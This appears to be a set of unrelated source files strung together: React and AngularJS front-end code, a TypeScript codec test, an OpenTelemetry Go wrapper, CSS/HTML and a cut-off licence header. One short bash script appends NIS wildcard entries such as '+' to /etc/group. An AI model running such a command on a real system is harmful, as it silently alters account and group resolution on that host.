// the helptip with the button - unfortunately this is not forwarded through react-router or mui
// thus, use the following component as a workaround:
const ForwardingLink = React.forwardRef((props, ref) => <Link {...props} innerRef={ref} />);
ForwardingLink.displayName = 'ForwardingLink';
let onboardingComponent = null;
let uploadArtifactOnboardingComponent = null;
if (this.repoItemAnchor && this.creationRef) {
const element = this.repoItemAnchor.itemRef;
const anchor = { left: element.offsetLeft + element.offsetWidth / 3, top: element.offsetTop + element.offsetHeight };
const artifactIncludedAnchor = {
left: this.creationRef.offsetLeft + this.creationRef.offsetWidth,
top: this.creationRef.offsetTop + this.creationRef.offsetHeight / 2
};
const artifactUploadedAnchor = {
left: this.creationRef.offsetLeft + this.creationRef.offsetWidth / 2,
top: this.creationRef.offsetTop - this.creationRef.offsetHeight / 2
};
onboardingComponent = getOnboardingComponentFor('artifact-included-onboarding', { anchor });
onboardingComponent = getOnboardingComponentFor(
'artifact-included-deploy-onboarding',
{ place: 'right', anchor: artifactIncludedAnchor },
onboardingComponent
);
onboardingComponent = getOnboardingComponentFor('deployments-past-completed', { anchor }, onboardingComponent);
onboardingComponent = getOnboardingComponentFor('artifact-modified-onboarding', { anchor: artifactUploadedAnchor, place: 'bottom' }, onboardingComponent);
}
if (this.dropzoneRef) {
const dropzoneAnchor = { left: this.dropzoneRef.offsetLeft, top: this.dropzoneRef.offsetTop + this.dropzoneRef.offsetHeight };
uploadArtifactOnboardingComponent = getOnboardingComponentFor('upload-prepared-artifact-tip', { anchor: dropzoneAnchor, place: 'left' });
}
return loading || wasSelectedRecently ? (
<div className="flexbox centered" style={{ width: '100%', height: '50%' }}>
<Loader show={true} />
</div>
) : (
<div className="relative release-repo margin-left" style={{ width: '100%' }}>
<div className="muted margin-bottom">
<Typography variant="body1" style={{ marginBottom: 10 }}>
Release:
</Typography>
<Typography variant="body2">{release ? release.Name : 'No release selected'}</Typography>
</div>
{!!release && (
<Typography variant="body1" style={{ fontWeight: 'bold' }}>
Artifacts in this Release:
</Typography>
)}
{uploadArtifactOnboardingComponent ? uploadArtifactOnboardingComponent : null}
<Loader show={loading} />
<div style={{ position: 'relative', marginTop: '10px' }}>
{items.length ? (
<div>
<div className="release-repo-item repo-item repo-header">
{columnHeaders.map(item => (
<Tooltip key={item.name} className="columnHeader" title={item.title} placement="top-start" onClick={() => self._sortColumn(item)}>
<div>
{item.title}
{item.sortable ? (
<SortIcon className={`sortIcon ${self.state.sortCol === item.name ? 'selected' : ''} ${self.state.sortDown.toString()}`} />
) : null}
</div>
</Tooltip>
))}
<div style={{ width: 48 }} />
</div>
{items}
<Button
color="primary"
variant="contained"
buttonRef={ref => (this.creationRef = ref)}
component={ForwardingLink}
to={`/deployments?open=true&release=${release.Name}`}
style={{ marginLeft: 20 }}
onClick={() => self.onCreateDeploymentFrom(release)}
>
Create deployment with this release
</Button>
</div>
) : null}
{showHelptips && onboardingComponent ? onboardingComponent : null}
{showHelptips && items.length ? (
<div>
<div id="onboard-10" className="tooltip help" data-tip data-for="artifact-expand-tip" data-event="click focus">
<HelpIcon />
</div>
<ReactTooltip id="artifact-expand-tip" globalEventOff="click" place="bottom" type="light" effect="solid" className="react-tooltip">
<ExpandArtifact />
</ReactTooltip>
</div>
) : null}
{items.length || loading ? null : (
<div className="dashboard-placeholder fadeIn" style={{ fontSize: '16px', margin: '8vh auto' }}>
{releases.length > 0 ? (
<p>Select a Release on the left to view its Artifact details</p>
) : (
<Dropzone
activeClassName="active"
disabled={uploading}
multiple={false}
noClick={true}
onDrop={(accepted, rejected) => self.onDrop(accepted, rejected)}
rejectClassName="active"
>
{({ getRootProps, getInputProps }) => (
<div {...getRootProps({ className: dropzoneClass })} onClick={() => onUpload()} ref={ref => (self.dropzoneRef = ref)}>
<input {...getInputProps()} disabled={uploading} />
<p>
There are no Releases yet. <a>Upload an Artifact</a> to create a new Release
</p>
</div>
)}
</Dropzone>
)}
</div>
)}
</div>
</div>
);
}
}
const actionCreators = { editArtifact, uploadArtifact, selectArtifact, setSnackbar, selectRelease };
const mapStateToProps = state => {
return {
onboardingComplete: state.users.onboarding.complete,
release: state.releases.selectedRelease ? state.releases.byId[state.releases.selectedRelease] : null,
releases: Object.values(state.releases.byId),
selectedArtifact: state.releases.selectedArtifact,
showHelptips: state.users.showHelptips,
uploading: state.releases.uploading
};
};
export default connect(mapStateToProps, actionCreators)(ReleaseRepository);
|
#!/usr/bin/env mocha -R spec
import {strict as assert} from "assert";
import {binJSON} from "../";
const TITLE = __filename.split("/").pop();
type Filter = (num: number) => any;
const toHex = (obj: ArrayBufferView | number[]) => {
if (ArrayBuffer.isView(obj)) {
obj = Array.from(new Uint8Array(obj.buffer, obj.byteOffset, obj.byteLength));
}
return obj.map(v => (0x100 | v).toString(16).substring(1)).join("-").toUpperCase();
};
interface Fn {
new(length: number): ArrayBufferView;
}
describe(TITLE, () => {
it("handlers.Uint8Array", () => {
assert(toHex([10, 11, 12, 13, 14, 15]), "0a-0b-0c-0d-0e-0f");
const data = new Uint8Array([0x24, 0xe6, 0xed, 0x42, 0xfd, 2, 0, 0, 0, 4, 0x41, 0x42, 0x43, 0x44]);
const decoded = binJSON.decode(data);
assert.equal(decoded instanceof Uint8Array, true);
assert.deepEqual(toHex(decoded), "41-42-43-44");
});
it("handlers.Uint32Array", () => {
const data = new Uint8Array([0x24, 0xf9, 0x8d, 0xfe, 0x49, 2, 0, 0, 0, 4, 0x41, 0x42, 0x43, 0x44]);
const decoded = binJSON.decode(data);
assert.equal(decoded instanceof Uint32Array, true);
assert.deepEqual(toHex(decoded), "41-42-43-44");
});
test("Int8Array", Int8Array);
test("Uint8Array", Uint8Array);
test("Uint8ClampedArray", Uint8ClampedArray);
test("Int16Array", Int16Array);
test("Uint16Array", Uint16Array);
test("Int32Array", Int32Array);
test("Uint32Array", Uint32Array);
test("Float32Array", Float32Array);
test("Float64Array", Float64Array);
const toBigInt = ("undefined" !== typeof BigInt) ? BigInt : null;
test("BigInt64Array", ("undefined" !== typeof BigInt64Array) ? BigInt64Array : null, toBigInt);
test("BigUint64Array", ("undefined" !== typeof BigUint64Array) ? BigUint64Array : null, toBigInt);
it("DataView", () => {
[0, 10, 100, 1000].forEach(size => {
const u8 = new Uint8Array(size);
for (let i = 0; i < size; i++) u8[i] = i;
const data = new DataView(u8.buffer, u8.byteOffset, u8.byteLength);
const decoded = binJSON.decode(binJSON.encode(data));
assert.equal(decoded?.constructor?.name, data.constructor.name);
assert.equal(toHex(decoded), toHex(data));
});
})
it("TypedArray[]", () => {
const data = [
new Int8Array([1]),
new Uint8Array([2]),
new Uint8ClampedArray([3]),
new Int16Array([4]),
new Uint16Array([5]),
new Int32Array([6]),
new Uint32Array([7]),
new Float32Array([8]),
new Float64Array([9]),
];
const encoded = binJSON.encode(data);
const decoded = binJSON.decode(encoded);
assert.equal(decoded.length, data.length);
for (let i = 0; i < decoded.length; i++) {
assert.deepEqual(toHex(decoded[i]), toHex(data[i]));
}
});
function test(title: string, fn: Fn, filter?: Filter) {
const IT = fn ? it : it.skip;
if (!filter) filter = (v => v);
IT(title, () => {
[0, 1, 10, 10000].forEach(size => {
const data = new fn(size) as any as number[];
assert.equal(data.length, size);
for (let i = 0; i < size; i++) data[i] = filter(i);
const decoded = binJSON.decode(binJSON.encode(data));
assert.equal(decoded instanceof fn, true, decoded?.constructor?.name);
assert.equal(decoded?.length, size);
assert.equal(toHex(decoded), toHex(data));
});
})
}
});
|
<filename>src/flatten.js
// @flow
import type { ReadableStreamController } from "./streams";
import { ReadableStream, WritableStream } from "./streams";
import { zipWith } from "./utils";
/**
* This function takes one or more streams and returns a readable combining
* the streams, returning chunks as they arrive in combined streams.
*
* @example
* let r1 = createReadable([1,2,3]),
* r2 = createReadable([4,5,6]),
* writable = createWritable(),
* flattened = flatten(r1,r2);
*
* flattened.pipeTo( writable ); // 1,4,2,5,3,6 (order depends on order received so may vary)
*/
export default function flatten(...streams: Array<ReadableStream>): ReadableStream {
let
flattenedStream: ReadableStream,
writers: Array<WritableStream> = [];
return flattenedStream = new ReadableStream({
start (controller: ReadableStreamController): Promise<mixed> {
// Create writers for each stream
while ( writers.length < streams.length )
writers.push( new WritableStream({
// write incoming to flattenedStream
write: controller.enqueue.bind( controller )
})
);
// Connect streams to writers
let
connect: (ReadableStream, WritableStream) => Promise<mixed> =
(r, w) => r.pipeTo( w ),
pipedAll: Array<Promise<mixed>>;
try {
pipedAll = zipWith( connect, streams, writers );
} catch (e) {
throw new Error("Only readable streams can be flattened.");
}
// Set up closing
return Promise.all( pipedAll ).then(
controller.close.bind( controller ),
controller.error.bind( controller )
);
},
cancel (): void {
// If cancelled, cancel all streams
streams.forEach( stream => stream.cancel() );
}
});
};
// Browserify compat
if ( typeof module !== "undefined" )
// $FlowFixMe
module.exports = flatten;
|
// Copyright The OpenTelemetry Authors
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package sdkapi // import "go.opentelemetry.io/otel/sdk/metric/sdkapi"
import (
"context"
"go.opentelemetry.io/otel/attribute"
"go.opentelemetry.io/otel/metric"
"go.opentelemetry.io/otel/metric/instrument"
"go.opentelemetry.io/otel/metric/instrument/asyncfloat64"
"go.opentelemetry.io/otel/metric/instrument/asyncint64"
"go.opentelemetry.io/otel/metric/instrument/syncfloat64"
"go.opentelemetry.io/otel/metric/instrument/syncint64"
"go.opentelemetry.io/otel/sdk/metric/number"
)
type (
meter struct{ MeterImpl }
sfMeter struct{ meter }
siMeter struct{ meter }
afMeter struct{ meter }
aiMeter struct{ meter }
iAdder struct{ SyncImpl }
fAdder struct{ SyncImpl }
iRecorder struct{ SyncImpl }
fRecorder struct{ SyncImpl }
iObserver struct{ AsyncImpl }
fObserver struct{ AsyncImpl }
)
func WrapMeterImpl(impl MeterImpl) metric.Meter {
return meter{impl}
}
func UnwrapMeterImpl(m metric.Meter) MeterImpl {
mm, ok := m.(meter)
if !ok {
return nil
}
return mm.MeterImpl
}
func (m meter) AsyncFloat64() asyncfloat64.InstrumentProvider {
return afMeter{m}
}
func (m meter) AsyncInt64() asyncint64.InstrumentProvider {
return aiMeter{m}
}
func (m meter) SyncFloat64() syncfloat64.InstrumentProvider {
return sfMeter{m}
}
func (m meter) SyncInt64() syncint64.InstrumentProvider {
return siMeter{m}
}
func (m meter) RegisterCallback(insts []instrument.Asynchronous, cb func(ctx context.Context)) error {
return m.MeterImpl.RegisterCallback(insts, cb)
}
func (m meter) newSync(name string, ikind InstrumentKind, nkind number.Kind, opts []instrument.Option) (SyncImpl, error) {
cfg := instrument.NewConfig(opts...)
return m.NewSyncInstrument(NewDescriptor(name, ikind, nkind, cfg.Description(), cfg.Unit()))
}
func (m meter) newAsync(name string, ikind InstrumentKind, nkind number.Kind, opts []instrument.Option) (AsyncImpl, error) {
cfg := instrument.NewConfig(opts...)
return m.NewAsyncInstrument(NewDescriptor(name, ikind, nkind, cfg.Description(), cfg.Unit()))
}
func (m afMeter) Counter(name string, opts ...instrument.Option) (asyncfloat64.Counter, error) {
inst, err := m.newAsync(name, CounterObserverInstrumentKind, number.Float64Kind, opts)
return fObserver{inst}, err
}
func (m afMeter) UpDownCounter(name string, opts ...instrument.Option) (asyncfloat64.UpDownCounter, error) {
inst, err := m.newAsync(name, UpDownCounterObserverInstrumentKind, number.Float64Kind, opts)
return fObserver{inst}, err
}
func (m afMeter) Gauge(name string, opts ...instrument.Option) (asyncfloat64.Gauge, error) {
inst, err := m.newAsync(name, GaugeObserverInstrumentKind, number.Float64Kind, opts)
return fObserver{inst}, err
}
func (m aiMeter) Counter(name string, opts ...instrument.Option) (asyncint64.Counter, error) {
inst, err := m.newAsync(name, CounterObserverInstrumentKind, number.Int64Kind, opts)
return iObserver{inst}, err
}
func (m aiMeter) UpDownCounter(name string, opts ...instrument.Option) (asyncint64.UpDownCounter, error) {
inst, err := m.newAsync(name, UpDownCounterObserverInstrumentKind, number.Int64Kind, opts)
return iObserver{inst}, err
}
func (m aiMeter) Gauge(name string, opts ...instrument.Option) (asyncint64.Gauge, error) {
inst, err := m.newAsync(name, GaugeObserverInstrumentKind, number.Int64Kind, opts)
return iObserver{inst}, err
}
func (m sfMeter) Counter(name string, opts ...instrument.Option) (syncfloat64.Counter, error) {
inst, err := m.newSync(name, CounterInstrumentKind, number.Float64Kind, opts)
return fAdder{inst}, err
}
func (m sfMeter) UpDownCounter(name string, opts ...instrument.Option) (syncfloat64.UpDownCounter, error) {
inst, err := m.newSync(name, UpDownCounterInstrumentKind, number.Float64Kind, opts)
return fAdder{inst}, err
}
func (m sfMeter) Histogram(name string, opts ...instrument.Option) (syncfloat64.Histogram, error) {
inst, err := m.newSync(name, HistogramInstrumentKind, number.Float64Kind, opts)
return fRecorder{inst}, err
}
func (m siMeter) Counter(name string, opts ...instrument.Option) (syncint64.Counter, error) {
inst, err := m.newSync(name, CounterInstrumentKind, number.Int64Kind, opts)
return iAdder{inst}, err
}
func (m siMeter) UpDownCounter(name string, opts ...instrument.Option) (syncint64.UpDownCounter, error) {
inst, err := m.newSync(name, UpDownCounterInstrumentKind, number.Int64Kind, opts)
return iAdder{inst}, err
}
func (m siMeter) Histogram(name string, opts ...instrument.Option) (syncint64.Histogram, error) {
inst, err := m.newSync(name, HistogramInstrumentKind, number.Int64Kind, opts)
return iRecorder{inst}, err
}
func (a fAdder) Add(ctx context.Context, value float64, attrs ...attribute.KeyValue) {
if a.SyncImpl != nil {
a.SyncImpl.RecordOne(ctx, number.NewFloat64Number(value), attrs)
}
}
func (a iAdder) Add(ctx context.Context, value int64, attrs ...attribute.KeyValue) {
if a.SyncImpl != nil {
a.SyncImpl.RecordOne(ctx, number.NewInt64Number(value), attrs)
}
}
func (a fRecorder) Record(ctx context.Context, value float64, attrs ...attribute.KeyValue) {
if a.SyncImpl != nil {
a.SyncImpl.RecordOne(ctx, number.NewFloat64Number(value), attrs)
}
}
func (a iRecorder) Record(ctx context.Context, value int64, attrs ...attribute.KeyValue) {
if a.SyncImpl != nil {
a.SyncImpl.RecordOne(ctx, number.NewInt64Number(value), attrs)
}
}
func (a fObserver) Observe(ctx context.Context, value float64, attrs ...attribute.KeyValue) {
if a.AsyncImpl != nil {
a.AsyncImpl.ObserveOne(ctx, number.NewFloat64Number(value), attrs)
}
}
func (a iObserver) Observe(ctx context.Context, value int64, attrs ...attribute.KeyValue) {
if a.AsyncImpl != nil {
a.AsyncImpl.ObserveOne(ctx, number.NewInt64Number(value), attrs)
}
}
|
#!/bin/bash
echo "+name" >> /etc/group
echo "+" >> /etc/group
echo "+@group" >> /etc/group
|
import React from "react";
export const CustomTextarea: React.FC<CustomTextareaProps> = ({
field,
form: { touched, errors },
label,
...props
}) => (
<div className="input-group">
{touched[field.name] && errors[field.name] ? (
<span className="label-input label-error">{errors[field.name]}</span>
) : (
<label className="label-input" htmlFor={field.name}>
{label}
</label>
)}
<textarea
cols={30}
rows={4}
id={field.name}
className={`input-form ${touched[field.name] && errors[field.name] && "input-error"}`}
{...field}
{...props}
name={field.name}
/>
</div>
);
type CustomTextareaProps = {
label: string;
field: { name: string };
form: { touched: Record<string, string[]>; errors: Record<string, string[]> };
};
|
<filename>src/main/resources/META-INF/resources/js/cric_controllers.js
'use strict';
/* Controllers */
envyLeagueApp.controller('CricMyLeaguesController', function ($scope, $cookies, $location, Session, CricketLeague) {
$scope.error = null;
$scope.errorMessage = null;
$scope.updateVisible = true;
//Ordering is important, used in template view
$scope.tabs = [
{
name: 'Registered',
disabled: false,
hidden:false
},
{
name: 'Pending',
disabled: false,
hidden:false
},
{
name: 'Cancelled',
disabled: false,
hidden:false
},
{
name: 'Owned',
disabled: false,
hidden:false
},
];
$scope.activeTab = $scope.tabs[0].name;
$scope.setActive = function(data) {
$scope.activeTab = data;
};
CricketLeague.query({},
function(data, responseHeaders) {
$scope.leagues = data;
$scope.ownedLeagues = [];
$scope.registeredLeagues = [];
$scope.pendingLeagues = [];
$scope.cancelledLeagues = [];
for (var i=0; i<$scope.leagues.length; i++) {
if (angular.equals($scope.leagues[i].owner.login,Session.login)) {
$scope.ownedLeagues.push($scope.leagues[i]);
}
if (angular.equals($scope.leagues[i].status,'ACTIVE')) {
for (var j=0; j<$scope.leagues[i].players.length; j++) {
if (angular.equals($scope.leagues[i].players[j].user,Session.login)) {
//Found logged in user one
if (angular.equals($scope.leagues[i].players[j].status,'ACTIVE')) {
$scope.registeredLeagues.push($scope.leagues[i]);
} else if (angular.equals($scope.leagues[i].players[j].status,'PENDING')) {
$scope.pendingLeagues.push($scope.leagues[i]);
} else if (angular.equals($scope.leagues[i].players[j].status,'CANCELLED')) {
$scope.cancelledLeagues.push($scope.leagues[i]);
}
}
}
}
}
if ($scope.pendingLeagues.length == 0) {
$scope.tabs[1].disabled = true;
$scope.tabs[1].hidden = true;
}
if ($scope.cancelledLeagues.length == 0) {
$scope.tabs[2].disabled = true;
$scope.tabs[2].hidden = true;
}
if ($scope.ownedLeagues.length == 0) {
$scope.tabs[3].disabled = true;
$scope.tabs[3].hidden = true;
}
},
function(httpResponse) {
$scope.error = "ERROR";
$scope.errorMessage = httpResponse.data.message;
}
);
$scope.updatePredictions = function(data) {
$cookies.preferredLeague = data.name;
$location.path('/cricket/predictions').replace();
};
$scope.viewPerformance = function(data) {
$cookies.preferredLeague = data.name;
$location.path('/cricket/performance').replace();
};
$scope.viewLeaderBoard = function(data) {
$cookies.preferredLeague = data.name;
$location.path('/cricket/leaders').replace();
};
$scope.manageLeague = function(data) {
$cookies.preferredLeague = data.name;
$location.path('/cricket/manageLeague').replace();
}
});
envyLeagueApp.controller('CricManageLeagueController', function($scope, $cookies, CricketLeague) {
$scope.error = null;
$scope.errorMessage = null;
$scope.updateVisible = true;
CricketLeague.query({owned:'true', league:$cookies.preferredLeague},
function(data, responseHeaders) {
$scope.leagues = data;
},
function(httpResponse) {
$scope.error = "ERROR";
$scope.errorMessage = httpResponse.data.message;
}
);
$scope.update = function(data) {
$scope.updateVisible = false;
$scope.error = null;
$scope.errorMessage = null;
CricketLeague.save(data,
function(data, responseHeaders) {
$scope.updateVisible = true;
},
function(httpResponse) {
$scope.updateVisible = true;
$scope.error = "ERROR";
$scope.errorMessage = httpResponse.data.message;
}
);
};
});
envyLeagueApp.controller('CricPredictionController',
function ($scope, $cookies, CricketPrediction, CricketUserLeague, CricketMatch, $filter, $modal) {
$scope.error = null;
$scope.changeLeague = function() {
$cookies.preferredLeague = $scope.selectedLeague;
for (var i=0;i<$scope.matches.length;i++) {
var selectedPredictions = $filter('filter')($scope.matches[i].predictions, {league:$scope.selectedLeague});
if (angular.isArray(selectedPredictions) && selectedPredictions.length==1) {
$scope.matches[i].prediction = selectedPredictions[0];
} else {
$scope.matches[i].prediction = {};
}
}
}
CricketUserLeague.query({},
function(data, responseHeaders) {
$scope.error = null;
$scope.errorMessage = null;
$scope.leagues = $filter('filter')(data, {userLeague: {status: 'ACTIVE'}});
if ($cookies.preferredLeague == 'undefined') {
if ($scope.leagues.length > 1) {
$cookies.preferredLeague = $scope.leagues[0].name;
$scope.selectedLeague = $cookies.preferredLeague;
}
} else {
for (var i=0;i<$scope.leagues.length; i++) {
if ($scope.leagues[i].name == $cookies.preferredLeague) {
$scope.selectedLeague = $cookies.preferredLeague;
break;
}
}
if ($scope.selectedLeague == undefined && $scope.leagues.length > 0) {
$cookies.preferredLeague = $scope.leagues[0].name;
$scope.selectedLeague = $cookies.preferredLeague;
}
}
CricketMatch.query({predictions:'true', future:'true'},
function(data, responseHeaders) {
$scope.matches = data;
for (var i=0;i<$scope.matches.length;i++) {
$scope.matches[i].winnerOptions= [
{value:$scope.matches[i].teamA,display:$scope.matches[i].teamA + ' Winner'},
{value:"Draw",display:"Draw"},
{value:$scope.matches[i].teamB,display:$scope.matches[i].teamB + ' Winner'}
];
}
$scope.changeLeague();//Just to set the prediction object on match correct.
},
function(httpResponse) {
$scope.error = "ERROR";
$scope.errorMessage = httpResponse.data.message;
}
);
},
function(httpResponse) {
$scope.error = "ERROR";
$scope.errorMessage = httpResponse.data.message;
}
);
$scope.viewPredictionModal = function(selectedMatch) {
var modalInstance = $modal.open({
templateUrl: 'predictionModalContent.html',
controller: 'PredictionModalInstanceCtrl',
size: 'lg',
resolve: {
match: function ()
{return selectedMatch;},
prediction: function ()
{return selectedMatch.prediction;},
league: function ()
{return $scope.selectedLeague;}
}
});
modalInstance.result.then(function (prediction) {
var matchIndex = -1;
for (var i=0;i<$scope.matches.length;i++) {
if ($scope.matches[i].number==selectedMatch.number) {
matchIndex = i;break;
}
}
var indexFound = -1;
for (var i=0;i<$scope.matches[matchIndex].predictions.length; i++) {
if ($scope.matches[matchIndex].predictions[i].league == prediction.league) {
indexFound = i;break;
}
}
if (indexFound == -1) {
$scope.matches[matchIndex].predictions.push(prediction);
} else {
$scope.matches[matchIndex].predictions[indexFound] = prediction;
}
$scope.matches[matchIndex].prediction = prediction;
}, function () {
//When modal is dismissed
});
};
});
envyLeagueApp.controller('PredictionModalInstanceCtrl',
function ($scope, $modalInstance, $filter, CricketPrediction, match, prediction, league) {
$scope.match = match;
$scope.selectedLeague = league;
$scope.prediction = angular.copy(prediction);
if (angular.isUndefined($scope.prediction.teamWinner)) {
$scope.prediction.teamWinner = 'Draw';
}
$scope.ok = function () {
if ($scope.prediction.match == undefined) {
//New request
$scope.prediction.match = $scope.match.number;
$scope.prediction.league = $scope.selectedLeague;
}
CricketPrediction.save($scope.prediction,
function(data, responseHeaders) {
},
function(httpResponse) {
$scope.error = "ERROR";
$scope.errorMessage = httpResponse.data.message;
}
);
$modalInstance.close($scope.prediction);
};
$scope.cancel = function () {
$modalInstance.dismiss('cancel');
};
}
);
envyLeagueApp.controller('CricPerformanceController',
function ($scope, $cookies, $modal, CricketPrediction, CricketUserLeague, CricketMatch, $filter) {
$scope.error = null;
$scope.changeLeague = function() {
$cookies.preferredLeague = $scope.selectedLeague;
for (var i=0;i<$scope.matches.length;i++) {
var selectedPredictions = $filter('filter')($scope.matches[i].predictions, {league:$scope.selectedLeague});
if (angular.isArray(selectedPredictions) && selectedPredictions.length==1) {
$scope.matches[i].prediction = selectedPredictions[0];
} else {
$scope.matches[i].prediction = {};
}
}
}
CricketUserLeague.query({},
function(data, responseHeaders) {
$scope.error = null;
$scope.errorMessage = null;
$scope.leagues = $filter('filter')(data, {userLeague: {status: 'ACTIVE'}});
if ($cookies.preferredLeague == 'undefined') {
if ($scope.leagues.length > 1) {
$cookies.preferredLeague = $scope.leagues[0].name;
$scope.selectedLeague = $cookies.preferredLeague;
}
} else {
for (var i=0;i<$scope.leagues.length; i++) {
if ($scope.leagues[i].name == $cookies.preferredLeague) {
$scope.selectedLeague = $cookies.preferredLeague;
}
}
if ($scope.selectedLeague == undefined && $scope.leagues.length > 0) {
$cookies.preferredLeague = $scope.leagues[0].name;
$scope.selectedLeague = $cookies.preferredLeague;
}
}
CricketMatch.query({predictions:'true', future:'false'},
function(data, responseHeaders) {
$scope.matches = data;
$scope.changeLeague();//Just to set the prediction object on match correct.
},
function(httpResponse) {
$scope.error = "ERROR";
$scope.errorMessage = httpResponse.data.message;
}
);
},
function(httpResponse) {
$scope.error = "ERROR";
$scope.errorMessage = httpResponse.data.message;
}
);
$scope.viewPerformanceModal = function(selectedMatch) {
var modalInstance = $modal.open({
templateUrl: 'performanceModalContent.html',
controller: 'PerformanceModalInstanceCtrl',
//size: 'sm',
resolve: {
match: function ()
{return selectedMatch;},
prediction: function ()
{return selectedMatch.prediction;},
league: function ()
{return $scope.selectedLeague;}
}
});
modalInstance.result.then(function (prediction) {
//Do Nothing
}, function () {
//When modal is dismissed
});
};
});
envyLeagueApp.controller('PerformanceModalInstanceCtrl',
function ($scope, $modalInstance, $filter, CricketPrediction, match, prediction, league) {
$scope.match = match;
$scope.selectedLeague = league;
$scope.prediction = angular.copy(prediction);
if (angular.isUndefined($scope.prediction.teamWinner)) {
$scope.prediction.teamWinner = 'Draw';
}
$scope.ok = function () {
$modalInstance.dismiss('ok');
};
}
);
envyLeagueApp.controller('CricNewLeagueController', function ($scope, CricketLeague) {
$scope.success = null;
$scope.error = null;
$scope.errorLeagueExists = null;
$scope.request = function() {
CricketLeague.request($scope.league,
function (value, responseHeaders) {
$scope.success = 'OK';
},
function (httpResponse) {
if (httpResponse.status === 400 && httpResponse.data === "League name already in use") {
$scope.error = null;
$scope.errorLeagueExists = "ERROR";
} else {
$scope.error = "ERROR";
}
}
);
}
});
envyLeagueApp.controller('CricAllLeaguesController', function ($scope, CricketUserLeague) {
$scope.registerVisible = true;
CricketUserLeague.query({},
function(data, responseHeaders) {
$scope.leagues = data;
},
function(httpResponse) {
$scope.error = "ERROR";
$scope.errorMessage = httpResponse.data;
}
);
$scope.register = function(data) {
CricketUserLeague.save(data,
function(responseData, responseHeaders) {
data.userLeague = {status : 'PENDING'};
data.userLeague = {statusDescription : 'Pending Approval'};
$scope.registerVisible = true;
},
function(httpResponse) {
$scope.registerVisible = true;
$scope.error = "ERROR";
$scope.errorMessage = httpResponse.data;
}
);
};
});
envyLeagueApp.controller('CricLeadersController',
function ($scope, $cookies, CricketPrediction, CricketUserLeague, CricketMatch, CricketLeaders, $filter) {
$scope.error = null;
CricketUserLeague.query({},
function(data, responseHeaders) {
$scope.error = null;
$scope.errorMessage = null;
$scope.leagues = $filter('filter')(data, {userLeague: {status: 'ACTIVE'}});
if ($cookies.preferredLeague == 'undefined') {
if ($scope.leagues.length > 0) {
$cookies.preferredLeague = $scope.leagues[0].name;
$scope.selectedLeague = $cookies.preferredLeague;
}
} else {
for (var i=0;i<$scope.leagues.length; i++) {
if ($scope.leagues[i].name == $cookies.preferredLeague) {
$scope.selectedLeague = $cookies.preferredLeague;
}
}
if ($scope.selectedLeague == undefined && $scope.leagues.length > 0) {
$cookies.preferredLeague = $scope.leagues[0].name;
$scope.selectedLeague = $cookies.preferredLeague;
}
}
if ($scope.selectedLeague != undefined) {
CricketLeaders.query({'league': $scope.selectedLeague},
function(data, responseHeaders) {
$scope.users = data;
},
function(httpResponse) {
$scope.error = "ERROR";
$scope.errorMessage = httpResponse.data.message;
}
);
}
},
function(httpResponse) {
$scope.error = "ERROR";
$scope.errorMessage = httpResponse.data;
}
);
$scope.changeLeague = function() {
$scope.error = null;
$scope.users = null;
$cookies.preferredLeague = $scope.selectedLeague;
CricketLeaders.query({'league': $scope.selectedLeague},
function(data, responseHeaders) {
$scope.users = data;
},
function(httpResponse) {
$scope.error = "ERROR";
$scope.errorMessage = httpResponse.data;
}
);
}
});
envyLeagueApp.controller('CricRulesController', function ($scope) {
});
//Admin Controllers
envyLeagueApp.controller('AdminLeagueController', function ($scope, AdminLeague) {
$scope.updateVisible = true;
AdminLeague.query({},
function(data, responseHeaders) {
$scope.leagues = data;
},
function(httpResponse) {
$scope.error = "ERROR";
$scope.errorMessage = httpResponse.data;
}
);
$scope.update = function(data) {
$scope.updateVisible = false;
$scope.error = null;
$scope.errorMessage = null;
AdminLeague.save(data,
function(data, responseHeaders) {
$scope.updateVisible = true;
},
function(httpResponse) {
$scope.updateVisible = true;
$scope.error = "ERROR";
$scope.errorMessage = httpResponse.data;
}
);
};
});
envyLeagueApp.controller('AdminMatchController', function ($scope, CricketMatch, AdminMatch) {
$scope.updateVisible = true;
CricketMatch.query({predictions:'false', future:'false'},
function(data, responseHeaders) {
$scope.matches = data;
for (var i=0;i<$scope.matches.length;i++) {
$scope.matches[i].winnerOptions= [
{value:$scope.matches[i].teamA,display:$scope.matches[i].teamA + ' Winner'},
{value:"",display:"Draw"},
{value:$scope.matches[i].teamB,display:$scope.matches[i].teamB + ' Winner'}
];
}
},
function(httpResponse) {
$scope.error = "ERROR";
$scope.errorMessage = httpResponse.data;
}
);
$scope.finalize = function(match) {
$scope.updateVisible = false;
AdminMatch.save(match,
function(data, responseHeaders) {
$scope.updateVisible = true;
match.finalized = true;
},
function(httpResponse) {
$scope.updateVisible = true;
$scope.error = "ERROR";
$scope.errorMessage = httpResponse.data;
}
);
}
}); |
body {
font-family: sans-serif;
}
#title {
text-align: center;
font-size: 1.5em;
font-weight: bold;
}
#navigation {
text-align: center;
bottom: 0;
width: 100%;
position: fixed;
background: #ddd;
}
#navigation a {
text-decoration: none;
padding: 0.5em;
color: black;
}
#welcome {
margin-top: 1.5em;
text-align: center;
font-size: 1.2em;
}
<body>
<div id="title">My App</div>
<div id="navigation">
<a href="home.html">Home</a>
<a href="search.html">Search</a>
<a href="settings.html">Settings</a>
<a href="profile.html">Profile</a>
<a href="about.html">About</a>
</div>
<div id="welcome">Welcome to My App!</div>
</body> |
/*
Copyright (c) 2017, UPMC Enterprises
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name UPMC Enterprises nor the
names of its contributors may be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL UPMC ENTERPRISES BE LIABLE FOR ANY
